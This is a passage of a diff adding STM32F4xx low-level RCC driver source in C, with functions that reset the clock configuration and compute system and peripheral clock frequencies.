+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_rcc.h" +#ifdef USE_FULL_ASSERT + #include "stm32_assert.h" +#else + #define assert_param(expr) ((void)0U) +#endif +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined(RCC) + +/** @addtogroup RCC_LL + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/** @addtogroup RCC_LL_Private_Macros + * @{ + */ +#if defined(FMPI2C1) +#define IS_LL_RCC_FMPI2C_CLKSOURCE(__VALUE__) ((__VALUE__) == LL_RCC_FMPI2C1_CLKSOURCE) +#endif /* FMPI2C1 */ + +#if defined(LPTIM1) +#define IS_LL_RCC_LPTIM_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_LPTIM1_CLKSOURCE)) +#endif /* LPTIM1 */ + +#if defined(SAI1) +#if defined(RCC_DCKCFGR_SAI1SRC) +#define IS_LL_RCC_SAI_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_SAI1_CLKSOURCE) \ + || ((__VALUE__) == LL_RCC_SAI2_CLKSOURCE)) +#elif defined(RCC_DCKCFGR_SAI1ASRC) +#define IS_LL_RCC_SAI_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_SAI1_A_CLKSOURCE) \ + || ((__VALUE__) == LL_RCC_SAI1_B_CLKSOURCE)) +#endif /* RCC_DCKCFGR_SAI1SRC */ +#endif /* SAI1 */ + +#if defined(SDIO) +#define IS_LL_RCC_SDIO_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_SDIO_CLKSOURCE)) +#endif /* SDIO */ + +#if defined(RNG) +#define IS_LL_RCC_RNG_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_RNG_CLKSOURCE)) +#endif /* RNG */ + +#if defined(USB_OTG_FS) || defined(USB_OTG_HS) +#define IS_LL_RCC_USB_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_USB_CLKSOURCE)) +#endif /* USB_OTG_FS || USB_OTG_HS */ + +#if defined(DFSDM2_Channel0) +#define IS_LL_RCC_DFSDM_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_DFSDM1_CLKSOURCE)) + +#define IS_LL_RCC_DFSDM_AUDIO_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_DFSDM1_AUDIO_CLKSOURCE) \ + || ((__VALUE__) == LL_RCC_DFSDM2_AUDIO_CLKSOURCE)) +#elif defined(DFSDM1_Channel0) +#define IS_LL_RCC_DFSDM_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_DFSDM1_CLKSOURCE)) + +#define IS_LL_RCC_DFSDM_AUDIO_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_DFSDM1_AUDIO_CLKSOURCE)) +#endif /* DFSDM2_Channel0 */ + +#if defined(RCC_DCKCFGR_I2S2SRC) +#define IS_LL_RCC_I2S_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_I2S1_CLKSOURCE) \ + || ((__VALUE__) == LL_RCC_I2S2_CLKSOURCE)) +#else +#define IS_LL_RCC_I2S_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_I2S1_CLKSOURCE)) +#endif /* RCC_DCKCFGR_I2S2SRC */ + +#if defined(CEC) +#define IS_LL_RCC_CEC_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_CEC_CLKSOURCE)) +#endif /* CEC */ + +#if defined(DSI) +#define IS_LL_RCC_DSI_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_DSI_CLKSOURCE)) +#endif /* DSI */ + +#if defined(LTDC) +#define IS_LL_RCC_LTDC_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_LTDC_CLKSOURCE)) +#endif /* LTDC */ + +#if defined(SPDIFRX) +#define IS_LL_RCC_SPDIFRX_CLKSOURCE(__VALUE__) (((__VALUE__) == LL_RCC_SPDIFRX1_CLKSOURCE)) +#endif /* SPDIFRX */ +/** + * @} + */ + +/* Private function prototypes -----------------------------------------------*/ +/** @defgroup RCC_LL_Private_Functions RCC Private functions + * @{ + */ +uint32_t RCC_GetSystemClockFreq(void); +uint32_t RCC_GetHCLKClockFreq(uint32_t SYSCLK_Frequency); +uint32_t RCC_GetPCLK1ClockFreq(uint32_t HCLK_Frequency); +uint32_t RCC_GetPCLK2ClockFreq(uint32_t HCLK_Frequency); +uint32_t RCC_PLL_GetFreqDomain_SYS(uint32_t SYSCLK_Source); +uint32_t RCC_PLL_GetFreqDomain_48M(void); +#if defined(RCC_DCKCFGR_I2SSRC) || defined(RCC_DCKCFGR_I2S1SRC) +uint32_t RCC_PLL_GetFreqDomain_I2S(void); +#endif /* RCC_DCKCFGR_I2SSRC || RCC_DCKCFGR_I2S1SRC */ +#if defined(SPDIFRX) +uint32_t RCC_PLL_GetFreqDomain_SPDIFRX(void); +#endif /* SPDIFRX */ +#if defined(RCC_PLLCFGR_PLLR) +#if defined(SAI1) +uint32_t RCC_PLL_GetFreqDomain_SAI(void); +#endif /* SAI1 */ +#endif /* RCC_PLLCFGR_PLLR */ +#if defined(DSI) +uint32_t RCC_PLL_GetFreqDomain_DSI(void); +#endif /* DSI */ +#if defined(RCC_PLLSAI_SUPPORT) +uint32_t RCC_PLLSAI_GetFreqDomain_SAI(void); +#if defined(RCC_PLLSAICFGR_PLLSAIP) +uint32_t RCC_PLLSAI_GetFreqDomain_48M(void); +#endif /* RCC_PLLSAICFGR_PLLSAIP */ +#if defined(LTDC) +uint32_t RCC_PLLSAI_GetFreqDomain_LTDC(void); +#endif /* LTDC */ +#endif /* RCC_PLLSAI_SUPPORT */ +#if defined(RCC_PLLI2S_SUPPORT) +uint32_t RCC_PLLI2S_GetFreqDomain_I2S(void); +#if defined(RCC_PLLI2SCFGR_PLLI2SQ) && !defined(RCC_DCKCFGR_PLLI2SDIVQ) +uint32_t RCC_PLLI2S_GetFreqDomain_48M(void); +#endif /* RCC_PLLI2SCFGR_PLLI2SQ && !RCC_DCKCFGR_PLLI2SDIVQ */ +#if defined(SAI1) +uint32_t RCC_PLLI2S_GetFreqDomain_SAI(void); +#endif /* SAI1 */ +#if defined(SPDIFRX) +uint32_t RCC_PLLI2S_GetFreqDomain_SPDIFRX(void); +#endif /* SPDIFRX */ +#endif /* RCC_PLLI2S_SUPPORT */ +/** + * @} + */ + + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup RCC_LL_Exported_Functions + * @{ + */ + +/** @addtogroup RCC_LL_EF_Init + * @{ + */ + +/** + * @brief Reset the RCC clock configuration to the default reset state. + * @note The default reset state of the clock configuration is given below: + * - HSI ON and used as system clock source + * - HSE and PLL OFF + * - AHB, APB1 and APB2 prescaler set to 1. + * - CSS, MCO OFF + * - All interrupts disabled + * @note This function doesn't modify the configuration of the + * - Peripheral clocks + * - LSI, LSE and RTC clocks + * @retval An ErrorStatus enumeration value: + * - SUCCESS: RCC registers are de-initialized + * - ERROR: not applicable + */ +ErrorStatus LL_RCC_DeInit(void) +{ + __IO uint32_t vl_mask; + + /* Set HSION bit */ + LL_RCC_HSI_Enable(); + + /* Wait for HSI READY bit */ + while(LL_RCC_HSI_IsReady() != 1U) + {} + + /* Reset CFGR register */ + LL_RCC_WriteReg(CFGR, 0x00000000U); + + /* Read CR register */ + vl_mask = LL_RCC_ReadReg(CR); + + /* Reset HSEON, HSEBYP, PLLON, CSSON bits */ + CLEAR_BIT(vl_mask, + (RCC_CR_HSEON | RCC_CR_HSEBYP | RCC_CR_PLLON | RCC_CR_CSSON)); + +#if defined(RCC_PLLSAI_SUPPORT) + /* Reset PLLSAION bit */ + CLEAR_BIT(vl_mask, RCC_CR_PLLSAION); +#endif /* RCC_PLLSAI_SUPPORT */ + +#if defined(RCC_PLLI2S_SUPPORT) + /* Reset PLLI2SON bit */ + CLEAR_BIT(vl_mask, RCC_CR_PLLI2SON); +#endif /* RCC_PLLI2S_SUPPORT */ + + /* Write new value in CR register */ + LL_RCC_WriteReg(CR, vl_mask); + + /* Set HSITRIM bits to the reset value*/ + LL_RCC_HSI_SetCalibTrimming(0x10U); + + /* Wait for PLL READY bit to be reset */ + while(LL_RCC_PLL_IsReady() != 0U) + {} + + /* Reset PLLCFGR register */ + LL_RCC_WriteReg(PLLCFGR, RCC_PLLCFGR_RST_VALUE); + +#if defined(RCC_PLLI2S_SUPPORT) + /* Reset PLLI2SCFGR register */ + LL_RCC_WriteReg(PLLI2SCFGR, RCC_PLLI2SCFGR_RST_VALUE); +#endif /* RCC_PLLI2S_SUPPORT */ + +#if defined(RCC_PLLSAI_SUPPORT) + /* Reset PLLSAICFGR register */ + LL_RCC_WriteReg(PLLSAICFGR, RCC_PLLSAICFGR_RST_VALUE); +#endif /* RCC_PLLSAI_SUPPORT */ + + /* Disable all interrupts */ + CLEAR_BIT(RCC->CIR, RCC_CIR_LSIRDYIE | RCC_CIR_LSERDYIE | RCC_CIR_HSIRDYIE | RCC_CIR_HSERDYIE | RCC_CIR_PLLRDYIE); + +#if defined(RCC_CIR_PLLI2SRDYIE) + CLEAR_BIT(RCC->CIR, RCC_CIR_PLLI2SRDYIE); +#endif /* RCC_CIR_PLLI2SRDYIE */ + +#if defined(RCC_CIR_PLLSAIRDYIE) + CLEAR_BIT(RCC->CIR, RCC_CIR_PLLSAIRDYIE); +#endif /* RCC_CIR_PLLSAIRDYIE */ + + /* Clear all interrupt flags */ + SET_BIT(RCC->CIR, RCC_CIR_LSIRDYC | RCC_CIR_LSERDYC | RCC_CIR_HSIRDYC | RCC_CIR_HSERDYC | RCC_CIR_PLLRDYC | RCC_CIR_CSSC); + +#if defined(RCC_CIR_PLLI2SRDYC) + SET_BIT(RCC->CIR, RCC_CIR_PLLI2SRDYC); +#endif /* RCC_CIR_PLLI2SRDYC */ + +#if defined(RCC_CIR_PLLSAIRDYC) + SET_BIT(RCC->CIR, RCC_CIR_PLLSAIRDYC); +#endif /* RCC_CIR_PLLSAIRDYC */ + + /* Clear LSION bit */ + CLEAR_BIT(RCC->CSR, RCC_CSR_LSION); + + /* Reset all CSR flags */ + SET_BIT(RCC->CSR, RCC_CSR_RMVF); + + return SUCCESS; +} + +/** + * @} + */ + +/** @addtogroup RCC_LL_EF_Get_Freq + * @brief Return the frequencies of different on chip clocks; System, AHB, APB1 and APB2 buses clocks + * and different peripheral clocks available on the device. + * @note If SYSCLK source is HSI, function returns values based on HSI_VALUE(**) + * @note If SYSCLK source is HSE, function returns values based on HSE_VALUE(***) + * @note If SYSCLK source is PLL, function returns values based on HSE_VALUE(***) + * or HSI_VALUE(**) multiplied/divided by the PLL factors. + * @note (**) HSI_VALUE is a constant defined in this file (default value + * 16 MHz) but the real value may vary depending on the variations + * in voltage and temperature. + * @note (***) HSE_VALUE is a constant defined in this file (default value + * 25 MHz), user has to ensure that HSE_VALUE is same as the real + * frequency of the crystal used. Otherwise, this function may + * have wrong result. + * @note The result of this function could be incorrect when using fractional + * value for HSE crystal. + * @note This function can be used by the user application to compute the + * baud-rate for the communication peripherals or configure other parameters. + * @{ + */ + +/** + * @brief Return the frequencies of different on chip clocks; System, AHB, APB1 and APB2 buses clocks + * @note Each time SYSCLK, HCLK, PCLK1 and/or PCLK2 clock changes, this function + * must be called to update structure fields. Otherwise, any + * configuration based on this function will be incorrect. + * @param RCC_Clocks pointer to a @ref LL_RCC_ClocksTypeDef structure which will hold the clocks frequencies + * @retval None + */ +void LL_RCC_GetSystemClocksFreq(LL_RCC_ClocksTypeDef *RCC_Clocks) +{ + /* Get SYSCLK frequency */ + RCC_Clocks->SYSCLK_Frequency = RCC_GetSystemClockFreq(); + + /* HCLK clock frequency */ + RCC_Clocks->HCLK_Frequency = RCC_GetHCLKClockFreq(RCC_Clocks->SYSCLK_Frequency); + + /* PCLK1 clock frequency */ + RCC_Clocks->PCLK1_Frequency = RCC_GetPCLK1ClockFreq(RCC_Clocks->HCLK_Frequency); + + /* PCLK2 clock frequency */ + RCC_Clocks->PCLK2_Frequency = RCC_GetPCLK2ClockFreq(RCC_Clocks->HCLK_Frequency); +} + +#if defined(FMPI2C1) +/** + * @brief Return FMPI2Cx clock frequency + * @param FMPI2CxSource This parameter can be one of the following values: + * @arg @ref LL_RCC_FMPI2C1_CLKSOURCE + * @retval FMPI2C clock frequency (in Hz) + * - @ref LL_RCC_PERIPH_FREQUENCY_NO indicates that HSI oscillator is not ready + */ +uint32_t LL_RCC_GetFMPI2CClockFreq(uint32_t FMPI2CxSource) +{ + uint32_t FMPI2C_frequency = LL_RCC_PERIPH_FREQUENCY_NO; + + /* Check parameter */ + assert_param(IS_LL_RCC_FMPI2C_CLKSOURCE(FMPI2CxSource)); + + if (FMPI2CxSource == LL_RCC_FMPI2C1_CLKSOURCE) + { + /* FMPI2C1 CLK clock frequency */ + switch (LL_RCC_GetFMPI2CClockSource(FMPI2CxSource)) + { + case LL_RCC_FMPI2C1_CLKSOURCE_SYSCLK: /* FMPI2C1 Clock is System Clock */ + FMPI2C_frequency = RCC_GetSystemClockFreq(); + break; + + case LL_RCC_FMPI2C1_CLKSOURCE_HSI: /* FMPI2C1 Clock is HSI Osc. */ + if (LL_RCC_HSI_IsReady()) + { + FMPI2C_frequency = HSI_VALUE; + } + break; + + case LL_RCC_FMPI2C1_CLKSOURCE_PCLK1: /* FMPI2C1 Clock is PCLK1 */ + default: + FMPI2C_frequency = RCC_GetPCLK1ClockFreq(RCC_GetHCLKClockFreq(RCC_GetSystemClockFreq())); + break; + } + } + + return FMPI2C_frequency; +} +#endif /* FMPI2C1 */ + +/** + * @brief Return I2Sx clock frequency + * @param I2SxSource This parameter can be one of the following values: + * @arg @ref LL_RCC_I2S1_CLKSOURCE + * @arg @ref LL_RCC_I2S2_CLKSOURCE (*) + * + * (*) value not defined in all devices. + * @retval I2S clock frequency (in Hz) + * - @ref LL_RCC_PERIPH_FREQUENCY_NO indicates that oscillator is not ready + */ +uint32_t LL_RCC_GetI2SClockFreq(uint32_t I2SxSource) +{ + uint32_t i2s_frequency = LL_RCC_PERIPH_FREQUENCY_NO; + + /* Check parameter */ + assert_param(IS_LL_RCC_I2S_CLKSOURCE(I2SxSource)); + + if (I2SxSource == LL_RCC_I2S1_CLKSOURCE) + { + /* I2S1 CLK clock frequency */ + switch (LL_RCC_GetI2SClockSource(I2SxSource)) + { +#if defined(RCC_PLLI2S_SUPPORT) + case LL_RCC_I2S1_CLKSOURCE_PLLI2S: /* I2S1 Clock is PLLI2S */ + if (LL_RCC_PLLI2S_IsReady()) + { + i2s_frequency = RCC_PLLI2S_GetFreqDomain_I2S(); + } + break; +#endif /* RCC_PLLI2S_SUPPORT */ + +#if defined(RCC_DCKCFGR_I2SSRC) || defined(RCC_DCKCFGR_I2S1SRC) + case LL_RCC_I2S1_CLKSOURCE_PLL: /* I2S1 Clock is PLL */ + if (LL_RCC_PLL_IsReady()) + { + i2s_frequency = RCC_PLL_GetFreqDomain_I2S(); + } + break; + + case LL_RCC_I2S1_CLKSOURCE_PLLSRC: /* I2S1 Clock is PLL Main source */ + switch (LL_RCC_PLL_GetMainSource()) + { + case LL_RCC_PLLSOURCE_HSE: /* I2S1 Clock is HSE Osc. */ + if (LL_RCC_HSE_IsReady()) + { + i2s_frequency = HSE_VALUE; + } + break; + + case LL_RCC_PLLSOURCE_HSI: /* I2S1 Clock is HSI Osc. */ + default: + if (LL_RCC_HSI_IsReady()) + { + i2s_frequency = HSI_VALUE; + } + break; + } + break; +#endif /* RCC_DCKCFGR_I2SSRC || RCC_DCKCFGR_I2S1SRC */ + + case LL_RCC_I2S1_CLKSOURCE_PIN: /* I2S1 Clock is External clock */ + default: + i2s_frequency = EXTERNAL_CLOCK_VALUE; + break; + } + } +#if defined(RCC_DCKCFGR_I2S2SRC) + else + { + /* I2S2 CLK clock frequency */ + switch (LL_RCC_GetI2SClockSource(I2SxSource)) + { + case LL_RCC_I2S2_CLKSOURCE_PLLI2S: /* I2S2 Clock is PLLI2S */ + if (LL_RCC_PLLI2S_IsReady()) + { + i2s_frequency = RCC_PLLI2S_GetFreqDomain_I2S(); + } + break; + + case LL_RCC_I2S2_CLKSOURCE_PLL: /* I2S2 Clock is PLL */ + if (LL_RCC_PLL_IsReady()) + { + i2s_frequency = RCC_PLL_GetFreqDomain_I2S(); + } + break; + + case LL_RCC_I2S2_CLKSOURCE_PLLSRC: /* I2S2 Clock is PLL Main source */ + switch (LL_RCC_PLL_GetMainSource()) + { + case LL_RCC_PLLSOURCE_HSE: /* I2S2 Clock is HSE Osc. */ + if (LL_RCC_HSE_IsReady()) + { + i2s_frequency = HSE_VALUE; + } + break; + + case LL_RCC_PLLSOURCE_HSI: /* I2S2 Clock is HSI Osc. */ + default: + if (LL_RCC_HSI_IsReady()) + { + i2s_frequency = HSI_VALUE; + } + break; + } + break; + + case LL_RCC_I2S2_CLKSOURCE_PIN: /* I2S2 Clock is External clock */ + default: + i2s_frequency = EXTERNAL_CLOCK_VALUE; + break; + } + } +#endif /* RCC_DCKCFGR_I2S2SRC */ + + return i2s_frequency; +} + +#if defined(LPTIM1) +/** + * @brief Return LPTIMx clock frequency + * @param LPTIMxSource This parameter can be one of the following values: + * @arg @ref LL_RCC_LPTIM1_CLKSOURCE + * @retval LPTIM clock frequency (in Hz) + * - @ref LL_RCC_PERIPH_FREQUENCY_NO indicates that oscillator (HSI, LSI or LSE) is not ready + */ +uint32_t LL_RCC_GetLPTIMClockFreq(uint32_t LPTIMxSource) +{ + uint32_t lptim_frequency = LL_RCC_PERIPH_FREQUENCY_NO; + + /* Check parameter */ + assert_param(IS_LL_RCC_LPTIM_CLKSOURCE(LPTIMxSource)); + + if (LPTIMxSource == LL_RCC_LPTIM1_CLKSOURCE) + { + /* LPTIM1CLK clock frequency */ + switch (LL_RCC_GetLPTIMClockSource(LPTIMxSource)) + { + case LL_RCC_LPTIM1_CLKSOURCE_LSI: /* LPTIM1 Clock is LSI Osc. */ + if (LL_RCC_LSI_IsReady()) + { + lptim_frequency = LSI_VALUE; + } + break; + + case LL_RCC_LPTIM1_CLKSOURCE_HSI: /* LPTIM1 Clock is HSI Osc. */ + if (LL_RCC_HSI_IsReady()) + { + lptim_frequency = HSI_VALUE; + } + break; + + case LL_RCC_LPTIM1_CLKSOURCE_LSE: /* LPTIM1 Clock is LSE Osc. */ + if (LL_RCC_LSE_IsReady()) + { + lptim_frequency = LSE_VALUE; + } + break; + + case LL_RCC_LPTIM1_CLKSOURCE_PCLK1: /* LPTIM1 Clock is PCLK1 */ + default: + lptim_frequency = RCC_GetPCLK1ClockFreq(RCC_GetHCLKClockFreq(RCC_GetSystemClockFreq())); + break; + } + } + + return lptim_frequency; +} +#endif /* LPTIM1 */ + +#if defined(SAI1) +/** + * @brief Return SAIx clock frequency + * @param SAIxSource This parameter can be one of the following values: + * @arg @ref LL_RCC_SAI1_CLKSOURCE (*) + * @arg @ref LL_RCC_SAI2_CLKSOURCE (*) + * @arg @ref LL_RCC_SAI1_A_CLKSOURCE (*) + * @arg @ref LL_RCC_SAI1_B_CLKSOURCE (*) + * + * (*) value not defined in all devices. + * @retval SAI clock frequency (in Hz) + * - @ref LL_RCC_PERIPH_FREQUENCY_NO indicates that oscillator is not ready + */ +uint32_t LL_RCC_GetSAIClockFreq(uint32_t SAIxSource) +{ + uint32_t sai_frequency = LL_RCC_PERIPH_FREQUENCY_NO; + + /* Check parameter */ + assert_param(IS_LL_RCC_SAI_CLKSOURCE(SAIxSource)); + +#if defined(RCC_DCKCFGR_SAI1SRC) + if ((SAIxSource == LL_RCC_SAI1_CLKSOURCE) || (SAIxSource == LL_RCC_SAI2_CLKSOURCE)) + { + /* SAI1CLK clock frequency */ + switch (LL_RCC_GetSAIClockSource(SAIxSource)) + { + case LL_RCC_SAI1_CLKSOURCE_PLLSAI: /* PLLSAI clock used as SAI1 clock source */ + case LL_RCC_SAI2_CLKSOURCE_PLLSAI: /* PLLSAI clock used as SAI2 clock source */ + if (LL_RCC_PLLSAI_IsReady()) + { + sai_frequency = RCC_PLLSAI_GetFreqDomain_SAI(); + } + break; + + case LL_RCC_SAI1_CLKSOURCE_PLLI2S: /* PLLI2S clock used as SAI1 clock source */ + case LL_RCC_SAI2_CLKSOURCE_PLLI2S: /* PLLI2S clock used as SAI2 clock source */ + if (LL_RCC_PLLI2S_IsReady()) + { + sai_frequency = RCC_PLLI2S_GetFreqDomain_SAI(); + } + break; + + case LL_RCC_SAI1_CLKSOURCE_PLL: /* PLL clock used as SAI1 clock source */ + case LL_RCC_SAI2_CLKSOURCE_PLL: /* PLL clock used as SAI2 clock source */ + if (LL_RCC_PLL_IsReady()) + { + sai_frequency = RCC_PLL_GetFreqDomain_SAI(); + } + break; + + case LL_RCC_SAI2_CLKSOURCE_PLLSRC: + switch (LL_RCC_PLL_GetMainSource()) + { + case LL_RCC_PLLSOURCE_HSE: /* HSE clock used as SAI2 clock source */ + if (LL_RCC_HSE_IsReady()) + { + sai_frequency = HSE_VALUE; + } + break; + + case LL_RCC_PLLSOURCE_HSI: /* HSI clock used as SAI2 clock source */ + default: + if (LL_RCC_HSI_IsReady()) + { + sai_frequency = HSI_VALUE; + } + break; + } + break; + + case LL_RCC_SAI1_CLKSOURCE_PIN: /* External input clock used as SAI1 clock source */ + default: + sai_frequency = EXTERNAL_CLOCK_VALUE; + break; + } + } +#endif /* RCC_DCKCFGR_SAI1SRC */ +#if defined(RCC_DCKCFGR_SAI1ASRC) + if ((SAIxSource == LL_RCC_SAI1_A_CLKSOURCE) || (SAIxSource == LL_RCC_SAI1_B_CLKSOURCE)) + { + /* SAI1CLK clock frequency */ + switch (LL_RCC_GetSAIClockSource(SAIxSource)) + { +#if defined(RCC_PLLSAI_SUPPORT) + case LL_RCC_SAI1_A_CLKSOURCE_PLLSAI: /* PLLSAI clock used as SAI1 Block A clock source */ + case LL_RCC_SAI1_B_CLKSOURCE_PLLSAI: /* PLLSAI clock used as SAI1 Block B clock source */ + if (LL_RCC_PLLSAI_IsReady()) + { + sai_frequency = RCC_PLLSAI_GetFreqDomain_SAI(); + } + break; +#endif /* RCC_PLLSAI_SUPPORT */ + + case LL_RCC_SAI1_A_CLKSOURCE_PLLI2S: /* PLLI2S clock used as SAI1 Block A clock source */ + case LL_RCC_SAI1_B_CLKSOURCE_PLLI2S: /* PLLI2S clock used as SAI1 Block B clock source */ + if (LL_RCC_PLLI2S_IsReady()) + { + sai_frequency = RCC_PLLI2S_GetFreqDomain_SAI(); + } + break; + +#if defined(RCC_SAI1A_PLLSOURCE_SUPPORT) + case LL_RCC_SAI1_A_CLKSOURCE_PLL: /* PLL clock used as SAI1 Block A clock source */ + case LL_RCC_SAI1_B_CLKSOURCE_PLL: /* PLL clock used as SAI1 Block B clock source */ + if (LL_RCC_PLL_IsReady()) + { + sai_frequency = RCC_PLL_GetFreqDomain_SAI(); + } + break; + + case LL_RCC_SAI1_A_CLKSOURCE_PLLSRC: + case LL_RCC_SAI1_B_CLKSOURCE_PLLSRC: + switch (LL_RCC_PLL_GetMainSource()) + { + case LL_RCC_PLLSOURCE_HSE: /* HSE clock used as SAI1 Block A or B clock source */ + if (LL_RCC_HSE_IsReady()) + { + sai_frequency = HSE_VALUE; + } + break; + + case LL_RCC_PLLSOURCE_HSI: /* HSI clock used as SAI1 Block A or B clock source */ + default: + if (LL_RCC_HSI_IsReady()) + { + sai_frequency = HSI_VALUE; + } + break; + } + break; +#endif /* RCC_SAI1A_PLLSOURCE_SUPPORT */ + + case LL_RCC_SAI1_A_CLKSOURCE_PIN: /* External input clock used as SAI1 Block A clock source */ + case LL_RCC_SAI1_B_CLKSOURCE_PIN: /* External input clock used as SAI1 Block B clock source */ + default: + sai_frequency = EXTERNAL_CLOCK_VALUE; + break; + } + } +#endif /* RCC_DCKCFGR_SAI1ASRC */ + + return sai_frequency; +} +#endif /* SAI1 */ + +#if defined(SDIO) +/** + * @brief Return SDIOx clock frequency + * @param SDIOxSource This parameter can be one of the following values: + * @arg @ref LL_RCC_SDIO_CLKSOURCE + * @retval SDIO clock frequency (in Hz) + * - @ref LL_RCC_PERIPH_FREQUENCY_NO indicates that oscillator is not ready + */ +uint32_t LL_RCC_GetSDIOClockFreq(uint32_t SDIOxSource) +{ + uint32_t SDIO_frequency = LL_RCC_PERIPH_FREQUENCY_NO; + + /* Check parameter */ + assert_param(IS_LL_RCC_SDIO_CLKSOURCE(SDIOxSource)); + + if (SDIOxSource == LL_RCC_SDIO_CLKSOURCE) + { +#if defined(RCC_DCKCFGR_SDIOSEL) || defined(RCC_DCKCFGR2_SDIOSEL) + /* SDIOCLK clock frequency */ + switch (LL_RCC_GetSDIOClockSource(SDIOxSource)) + { + case LL_RCC_SDIO_CLKSOURCE_PLL48CLK: /* PLL48M clock used as SDIO clock source */ + switch (LL_RCC_GetCK48MClockSource(LL_RCC_CK48M_CLKSOURCE)) + { + case LL_RCC_CK48M_CLKSOURCE_PLL: /* PLL clock used as 48Mhz domain clock */ + if (LL_RCC_PLL_IsReady()) + { + SDIO_frequency = RCC_PLL_GetFreqDomain_48M(); + } + break; + +#if defined(RCC_PLLSAI_SUPPORT) + case LL_RCC_CK48M_CLKSOURCE_PLLSAI: /* PLLSAI clock used as 48Mhz domain clock */ + default: + if (LL_RCC_PLLSAI_IsReady()) + { + SDIO_frequency = RCC_PLLSAI_GetFreqDomain_48M(); + } + break; +#endif /* RCC_PLLSAI_SUPPORT */ + +#if defined(RCC_PLLI2SCFGR_PLLI2SQ) && !defined(RCC_DCKCFGR_PLLI2SDIVQ) + case LL_RCC_CK48M_CLKSOURCE_PLLI2S: /* PLLI2S clock used as 48Mhz domain clock */ + default: + if (LL_RCC_PLLI2S_IsReady()) + { + SDIO_frequency = RCC_PLLI2S_GetFreqDomain_48M(); + } + break; +#endif /* RCC_PLLI2SCFGR_PLLI2SQ && !RCC_DCKCFGR_PLLI2SDIVQ */ + } + break; + + case LL_RCC_SDIO_CLKSOURCE_SYSCLK: /* PLL clock used as SDIO clock source */ + default: + SDIO_frequency = RCC_GetSystemClockFreq(); + break; + } +#else + /* PLL clock used as 48Mhz domain clock */ + if (LL_RCC_PLL_IsReady()) + { + SDIO_frequency = RCC_PLL_GetFreqDomain_48M(); + } +#endif /* RCC_DCKCFGR_SDIOSEL || RCC_DCKCFGR2_SDIOSEL */ + } + + return SDIO_frequency; +} +#endif /* SDIO */ + +#if defined(RNG) +/** + * @brief Return RNGx clock frequency + * @param RNGxSource This parameter can be one of the following values: + * @arg @ref LL_RCC_RNG_CLKSOURCE + * @retval RNG clock frequency (in Hz) + * - @ref LL_RCC_PERIPH_FREQUENCY_NO indicates that oscillator is not ready + */ +uint32_t LL_RCC_GetRNGClockFreq(uint32_t RNGxSource) +{ + uint32_t rng_frequency = LL_RCC_PERIPH_FREQUENCY_NO; + + /* Check parameter */ + assert_param(IS_LL_RCC_RNG_CLKSOURCE(RNGxSource)); + +#if defined(RCC_DCKCFGR_CK48MSEL) || defined(RCC_DCKCFGR2_CK48MSEL) + /* RNGCLK clock frequency */ + switch (LL_RCC_GetRNGClockSource(RNGxSource)) + { +#if defined(RCC_PLLI2SCFGR_PLLI2SQ) && !defined(RCC_DCKCFGR_PLLI2SDIVQ) + case LL_RCC_RNG_CLKSOURCE_PLLI2S: /* PLLI2S clock used as RNG clock source */ + if (LL_RCC_PLLI2S_IsReady()) + { + rng_frequency = RCC_PLLI2S_GetFreqDomain_48M(); + } + break; +#endif /* RCC_PLLI2SCFGR_PLLI2SQ && !RCC_DCKCFGR_PLLI2SDIVQ */ + +#if defined(RCC_PLLSAI_SUPPORT) + case LL_RCC_RNG_CLKSOURCE_PLLSAI: /* PLLSAI clock used as RNG clock source */ + if (LL_RCC_PLLSAI_IsReady()) + { + rng_frequency = RCC_PLLSAI_GetFreqDomain_48M(); + } + break; +#endif /* RCC_PLLSAI_SUPPORT */ + + case LL_RCC_RNG_CLKSOURCE_PLL: /* PLL clock used as RNG clock source */ + default: + if (LL_RCC_PLL_IsReady()) + { + rng_frequency = RCC_PLL_GetFreqDomain_48M(); + } + break; + } +#else + /* PLL clock used as RNG clock source */ + if (LL_RCC_PLL_IsReady()) + { + rng_frequency = RCC_PLL_GetFreqDomain_48M(); + } +#endif /* RCC_DCKCFGR_CK48MSEL || RCC_DCKCFGR2_CK48MSEL */ + + return rng_frequency; +} +#endif /* RNG */ + +#if defined(CEC) +/** + * @brief Return CEC clock frequency + * @param CECxSource This parameter can be one of the following values: + * @arg @ref LL_RCC_CEC_CLKSOURCE + * @retval CEC clock frequency (in Hz) + * - @ref LL_RCC_PERIPH_FREQUENCY_NO indicates that oscillator (HSI or LSE) is not ready + */ +uint32_t LL_RCC_GetCECClockFreq(uint32_t CECxSource) +{ + uint32_t cec_frequency = LL_RCC_PERIPH_FREQUENCY_NO; + + /* Check parameter */ + assert_param(IS_LL_RCC_CEC_CLKSOURCE(CECxSource)); + + /* CECCLK clock frequency */ + switch (LL_RCC_GetCECClockSource(CECxSource)) + { + case LL_RCC_CEC_CLKSOURCE_LSE: /* CEC Clock is LSE Osc. */ + if (LL_RCC_LSE_IsReady()) + { + cec_frequency = LSE_VALUE; + } + break; + + case LL_RCC_CEC_CLKSOURCE_HSI_DIV488: /* CEC Clock is HSI Osc. */ + default: + if (LL_RCC_HSI_IsReady()) + { + cec_frequency = HSI_VALUE/488U; + } + break; + } + + return cec_frequency; +} +#endif 